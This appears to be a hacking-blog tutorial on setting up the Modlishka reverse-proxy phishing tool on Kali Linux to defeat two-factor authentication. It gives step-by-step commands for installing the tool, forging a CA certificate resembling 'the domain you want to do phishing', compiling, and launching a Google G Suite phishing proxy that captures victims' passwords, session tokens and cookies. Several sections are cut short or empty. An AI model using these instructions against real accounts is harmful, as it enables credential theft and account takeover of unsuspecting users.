We all try to secure our online accounts as much as we can. We turn on Two-factor Authentication on our Facebook account or Gmail account etc. and we think that now we’re fully secure.
How Modlishka Works
This setup captures the victim’s username, password, site authentication token, the session created between them, cookies, and requests are and later these things can be used to create a web session.
Setup Modlishka in Kali Linux
Now we need to set our GOPATH. Apply the command-
export GOPATH=$HOME/go
To check the path apply the command echo $GOPATH. Now we need to download Modlishka to the go folder. We are applying the command-
go get -u github.com/drk1wi/Modlishka
This command will download the Modlishka tool to the go folder. Now change the directory to the go folder.
cd /root/go/src/github.com/drk1wi/Modlishka/
In the next step, we need to configure the SSL certificate. If you have a registered domain and SSL certificate, you can use them here. First of all, we are generating an RSA private key.
openssl genrsa -out MyCA.key 2048
You can name the key as you want. In the next, we need to generate the SSL certificate.
openssl req -x509 -new -nodes -key MyCA.key -sha256 -days 1024 -out MyCA.pem
In the information field section, you can fill according to you and similar to the domain you want to do phishing. Now we have to set both the Key and certificate in the Autocertificate file. Open the certificate in the leafpad and copy it.
leafpad MyCA.pem/
Now open the Autocertificate file with the command given below. Find for the line CA CERT= ‘PASTE YOUR CA CERT HERE’. Delete the sentence that is between the inverted commas and paste the certificate.
nano plugin/autocert.go
Save and close the file. Now open the RSA private key with leafpad and copy the Key.
leafpad MyCA.key
Now again open the Autocert file and find for the line CA CERT KEY= ‘PASTE YOUR CA CERT KEY HERE’. Delete the sentence from between the inverted commas and paste the key and save and close the file.
The next step is compiling the file. We will apply the command ‘make‘ and the file will be compiled.
Congrats! the tool is properly configured and now we can use the tool.
Initiate The Process of The Tool
./dist/proxy -h
This command will show all the available options we can use. You can also set up a new configuration file in order to point your custom phishing domain. Use the following command to open the default configuration file.
nano templates/google.com_gsuite.json
Here you can set your custom information to point your custom domain. But before that you need to configure your domain to point Modlishka server.
Before running the tool we need to import the SSL certificate to the browser. If we don’t do that it will show unsecured connection because we’ve generated a custom SSL certificate and we are on the localhost. To import it on Mozilla Firefox go to
Now we are free to start the Modlishka server. Load the default config file if you didn’t set your own. Use the command-
./dist/proxy -config templates/google.com_gsuite.json
Conclusion
Disclaimer
Haven't found the solution or are you having an unknown error? Join HackTalkForum.com to start a discussion or join a discussion on it. | ![]() |
Leave a Reply
View Comments